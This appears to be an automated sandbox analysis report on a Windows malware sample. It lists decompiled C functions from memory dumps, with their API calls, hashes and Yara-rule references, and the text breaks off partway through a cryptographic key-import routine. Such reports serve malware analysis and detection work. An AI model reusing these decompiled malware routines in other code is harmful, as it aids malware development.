Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: da60f444373b3aedbb2f53c290d23ebca7e072b5716092a5fdec6b83d1bd413f
Instruction ID: 44eba5267a37686d4faa8788570b7cadd86ae308f18de255e9093bc53cd75da3
Opcode Fuzzy Hash: da60f444373b3aedbb2f53c290d23ebca7e072b5716092a5fdec6b83d1bd413f
Instruction Fuzzy Hash: 6821417590120AEFCB95DFE8D98499EBBB9FF49344B1045A9FA11E7210EB34DA01CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02AF5454 Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02AF5454(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2afa2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2afa2f0; // 0x4f6d669f
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2afa2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02af545c
0x02af545f
0x02af5465
0x02af547d
0x02af547f
0x02af5484
0x02af5486
0x02af5489
0x02af548b
0x02af548e
0x02af5490
0x02af5490
0x02af5492
0x02af549d
0x02af54a2
0x02af54b3
0x02af54bb
0x02af54c0
0x02af54c3
0x02af54c6
0x02af54c8
0x02af54cb
0x02af54ce
0x02af54ce
0x02af54d1
0x02af54dc
0x02af54e1
0x02af54eb

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02AF2314,00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF545F
RtlAllocateHeap.NTDLL(00000000,?), ref: 02AF5477
memcpy.NTDLL(00000000,04F89600,-00000008,?,?,?,02AF2314,00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF54BB
memcpy.NTDLL(00000001,04F89600,00000001,02AF3831,00000000,04F89600), ref: 02AF54DC

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: dc74910189ffffcf728eba6aa81ad600e201f21f5e665aae49cca650094db5d2
Instruction ID: 5607bce6ecbb71ded3b917477a1dfb0fb675f11df649f433dace18a66ab6884e
Opcode Fuzzy Hash: dc74910189ffffcf728eba6aa81ad600e201f21f5e665aae49cca650094db5d2
Instruction Fuzzy Hash: 44115972E00245AFD7508BE9CC88D9EBBAEEB80361B140176F604D7250EF789E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF5854 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02AF5854(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E02AF5E6F(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x2afa348; // 0x248d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x2afb4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x2afb904; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E02AF2058();
					_push( &_v64);
					if( *0x2afa100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E02AF2058();
				}
				return _t28;
			}

0x02af5854
0x02af585b
0x02af5869
0x02af586d
0x02af5877
0x02af587c
0x02af5881
0x02af5886
0x02af5890
0x02af589a
0x02af589a
0x02af5892
0x02af5892
0x02af5892
0x02af5892
0x02af58a0
0x02af58a6
0x02af58a7
0x02af58aa
0x02af58ad
0x02af58b0
0x02af58b8
0x02af58c1
0x02af58c9
0x02af58c9
0x02af58cb
0x02af58cd
0x02af58cd
0x02af58d7

APIs

Part of subcall function 02AF5E6F: SysAllocString.OLEAUT32(00000000), ref: 02AF5EC9
Part of subcall function 02AF5E6F: SysAllocString.OLEAUT32(0070006F), ref: 02AF5EDD
Part of subcall function 02AF5E6F: SysAllocString.OLEAUT32(00000000), ref: 02AF5EEF

memset.NTDLL ref: 02AF5877
GetLastError.KERNEL32 ref: 02AF58C3

Strings

<, xrefs: 02AF5886
@MqtNqt, xrefs: 02AF58C3

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MqtNqt
API String ID: 3736384471-349977332
Opcode ID: 23b8a0d774c58a3e5c430ec6c388c0b78d1259ffa3ba87859de0a43798f2b66e
Instruction ID: ba5a7fabb7955c9f0be7d9e2594e7bd85102ced2af4d03748c7a594f9f7c91fd
Opcode Fuzzy Hash: 23b8a0d774c58a3e5c430ec6c388c0b78d1259ffa3ba87859de0a43798f2b66e
Instruction Fuzzy Hash: FD012D71D40218ABDB50EFE4D885EDEBBF8AB08744F814425FA08A7205EB389905CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02AF7571 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF7571(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02af757b
0x02af757f
0x02af7594
0x02af7596
0x02af759b
0x02af75a1
0x02af75a3
0x02af75a8
0x02af75b3
0x02af75aa
0x02af75aa
0x02af75aa
0x02af75a8
0x02af75c1

APIs

memset.NTDLL ref: 02AF757F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 02AF7594
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02AF75A1
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02AF3897,00000000,?), ref: 02AF75B3

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 060c56321c1d15414be2a7bea6dd8a408c1b0c5001016a3628c0bfa291ffcfea
Instruction ID: 88fabbd07bdd8bfc741492990d7a64707183b53c7c379a6e7b773c5888dcbe48
Opcode Fuzzy Hash: 060c56321c1d15414be2a7bea6dd8a408c1b0c5001016a3628c0bfa291ffcfea
Instruction Fuzzy Hash: 9AF05EB5504309BFD3606FA6DCC4C27FBACEB41298B11492EF64682501DB79E8198AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF75C2 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF75C2() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2afa30c; // 0x2bc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2afa35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2afa30c; // 0x2bc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2afa2d8; // 0x4b90000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02af75c2
0x02af75c9
0x02af7613
0x02af7615
0x02af7615
0x02af75cd
0x02af75d3
0x02af75d8
0x02af75dc
0x02af75e2
0x02af75e9
0x00000000
0x00000000
0x02af75eb
0x02af75f0
0x00000000
0x00000000
0x00000000
0x02af75f0
0x02af75f2
0x02af75fa
0x02af75fd
0x02af75fd
0x02af7603
0x02af760a
0x02af760d
0x02af760d
0x00000000

APIs

SetEvent.KERNEL32(000002BC,00000001,02AF394C), ref: 02AF75CD
SleepEx.KERNEL32(00000064,00000001), ref: 02AF75DC
CloseHandle.KERNEL32(000002BC), ref: 02AF75FD
HeapDestroy.KERNEL32(04B90000), ref: 02AF760D

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: a915dda2a9eeac935e2b2f3c910f81f958f0693004932a54fa5084869730dee4
Instruction ID: c6e0f48bd2f04534aa8dc164bf1ffccdcbb99f61ac6b1b0bfbb6a9a1f7ae08d4
Opcode Fuzzy Hash: a915dda2a9eeac935e2b2f3c910f81f958f0693004932a54fa5084869730dee4
Instruction Fuzzy Hash: 5EF05875F802128BDAA05BFAAC88B967798AB04765B040A14BB05D2282CF2CD4618660

Uniqueness

Uniqueness Score: -1.00%

Function 02AF3969 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF3969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E02AF3D2E(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E02AF1940(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E02AF6BEB(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x2afa2d8, 0, _t25);
				}
				return _t22;
			}

0x02af3969
0x02af397a
0x02af397e
0x02af39d9
0x02af3980
0x02af3987
0x02af398f
0x02af3997
0x02af399b
0x02af39a1
0x02af39a9
0x02af39ac
0x02af39c4
0x02af39c4
0x02af39cf
0x02af39cf
0x02af39e0

APIs

Part of subcall function 02AF3D2E: lstrlen.KERNEL32(?,00000000,04F89DC0,00000000,02AF695F,04F89FE3,69B25F44,?,?,?,?,69B25F44,00000005,02AFA00C,4D283A53,?), ref: 02AF3D35
Part of subcall function 02AF3D2E: mbstowcs.NTDLL ref: 02AF3D5E
Part of subcall function 02AF3D2E: memset.NTDLL ref: 02AF3D70

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,04F893CC), ref: 02AF39A1
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,04F893CC), ref: 02AF39CF

Strings

Uqt, xrefs: 02AF39CF

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uqt
API String ID: 1500278894-2320327147
Opcode ID: 9263f0f365cc5a15a8eb6dde05fd49d79517446aa2b0def89a18b70b318c378e
Instruction ID: de0a25e3e781350ff6fd06cd5004a0a35763440c442732b30ba503be6f014d3a
Opcode Fuzzy Hash: 9263f0f365cc5a15a8eb6dde05fd49d79517446aa2b0def89a18b70b318c378e
Instruction Fuzzy Hash: 5E01BC3224024ABADF615FE49C84F9B7B79EF84710F00442AFF449A160DF75D865CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02AF534A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02AF534A(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x2afa340;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x2afa2f4; // 0x2c0
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x2afa348; // 0x248d5a8
				_t3 = _t12 + 0x2afb0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x2afa348; // 0x248d5a8
				_t4 = _t17 + 0x2afb9e0; // 0x6f577349
				 *0x2afa314 = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x2afa340 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x02af534e
0x02af5353
0x02af5358
0x02af5360
0x02af5396
0x02af5398
0x02af539f
0x02af53a3
0x02af53a5
0x02af53a5
0x02af53a3
0x02af53a8
0x02af53ad
0x02af53ad
0x02af5362
0x02af5367
0x02af536e
0x02af5374
0x02af537a
0x02af5382
0x02af5387
0x02af538d
0x02af5394
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,00000001,?,?,02AF7307,?,?), ref: 02AF536E
GetProcAddress.KERNEL32(00000000,6F577349), ref: 02AF5387

Strings

Nqt, xrefs: 02AF5387

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Nqt
API String ID: 1646373207-806837294
Opcode ID: 672b782ec54b16e986845c5e4ad89af0029240ddcf6720fd9984e4f8c150428f
Instruction ID: fe994479b8e39e4c74ae49eea11a9f319df0787ad16655239d3864a34d4bc239
Opcode Fuzzy Hash: 672b782ec54b16e986845c5e4ad89af0029240ddcf6720fd9984e4f8c150428f
Instruction Fuzzy Hash: E0F04F75E413069FDBA0CBD8D994B9A73FCAB043097010A98FA04D3101EF7CEA16CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02AF452E Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02AF452E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02AF7A71(_t2);
				if(_t34 != 0) {
					_t30 = E02AF7A71(_t28);
					if(_t30 == 0) {
						E02AF789E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02AF7ABF(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02AF7ABF(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02af452e
0x02af4538
0x02af453a
0x02af4540
0x02af4540
0x02af4549
0x02af454d
0x02af4559
0x02af455d
0x02af45d1
0x02af455f
0x02af455f
0x02af4563
0x02af4568
0x02af456d
0x02af4587
0x02af4576
0x02af4576
0x02af457a
0x02af457d
0x02af4582
0x02af4582
0x02af458c
0x02af45b4
0x02af45ba
0x02af45bd
0x02af458e
0x02af4590
0x02af4598
0x02af45a3
0x02af45a8
0x02af45a8
0x02af45c4
0x02af45cb
0x02af45cc
0x02af45cc
0x02af455d
0x02af45dc

APIs

lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02AF2C92,?,?,?,?,00000102,02AF5D46,?,?,747581D0), ref: 02AF453A

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

Part of subcall function 02AF7ABF: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02AF4568,00000000,00000001,00000001,?,?,02AF2C92,?,?,?,?,00000102), ref: 02AF7ACD
Part of subcall function 02AF7ABF: StrChrA.SHLWAPI(?,0000003F,?,?,02AF2C92,?,?,?,?,00000102,02AF5D46,?,?,747581D0,00000000), ref: 02AF7AD7

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02AF2C92,?,?,?,?,00000102,02AF5D46,?), ref: 02AF4598
lstrcpy.KERNEL32(00000000,00000000), ref: 02AF45A8
lstrcpy.KERNEL32(00000000,00000000), ref: 02AF45B4

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 1078073b324be863d42afb50931739f10bcf965e4c5bc2f9578df315a39d3e15
Instruction ID: 71c321d188fbde3778191f35e301eb0e73b2176459d86431d8079166c7a783b6
Opcode Fuzzy Hash: 1078073b324be863d42afb50931739f10bcf965e4c5bc2f9578df315a39d3e15
Instruction Fuzzy Hash: AE218E72944255ABCB526FF4DC84AABBFB9AF49394F054054FB059B201DF39CE11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF262D Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF262D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02AF7A71(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02af2642
0x02af2646
0x02af2650
0x02af2655
0x02af265a
0x02af265c
0x02af2664
0x02af2669
0x02af2677
0x02af267c
0x02af2686

APIs

lstrlenW.KERNEL32(004F0053,?,74715520,00000008,04F893CC,?,02AF627D,004F0053,04F893CC,?,?,?,?,?,?,02AF521B), ref: 02AF263D
lstrlenW.KERNEL32(02AF627D,?,02AF627D,004F0053,04F893CC,?,?,?,?,?,?,02AF521B), ref: 02AF2644

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

memcpy.NTDLL(00000000,004F0053,747169A0,?,?,02AF627D,004F0053,04F893CC,?,?,?,?,?,?,02AF521B), ref: 02AF2664
memcpy.NTDLL(747169A0,02AF627D,00000002,00000000,004F0053,747169A0,?,?,02AF627D,004F0053,04F893CC), ref: 02AF2677

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 1075ead2b381294444fea367681e3d2e8fcf123f975cc59ebdb0a07a77ff707e
Instruction ID: edc9fa4578bfb1c84c29475876ae32a083ba864ac16c7b0727a8e12f1cdbe3fc
Opcode Fuzzy Hash: 1075ead2b381294444fea367681e3d2e8fcf123f975cc59ebdb0a07a77ff707e
Instruction Fuzzy Hash: EEF03736900159BB8F51ABE8CC84C9F7BADEF0839470140A2BA0497201EA35EA108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6311 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04F89BB8,00000000,00000000,00000000,02AF385C,00000000), ref: 02AF6321
lstrlen.KERNEL32(?), ref: 02AF6329

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

lstrcpy.KERNEL32(00000000,04F89BB8), ref: 02AF633D
lstrcat.KERNEL32(00000000,?), ref: 02AF6348

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 691790367a3d542d5d8fa5604c8641f633925b9c63bd9b4a1656aa7b702c2cc0
Instruction ID: c510ead2a1b1dc6fab2b011caa130c57fb19e852e400b9d1a881c14cd471a0fd
Opcode Fuzzy Hash: 691790367a3d542d5d8fa5604c8641f633925b9c63bd9b4a1656aa7b702c2cc0
Instruction Fuzzy Hash: 43E09233941621A787516BE8AC48D6BFBADFFC9791704081AF700D3100CF29C9228BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5020, Parent PID: 5080COMMON

Executed Functions

Function 02E347E5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E02E347E5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x2e3a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x2e3a0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
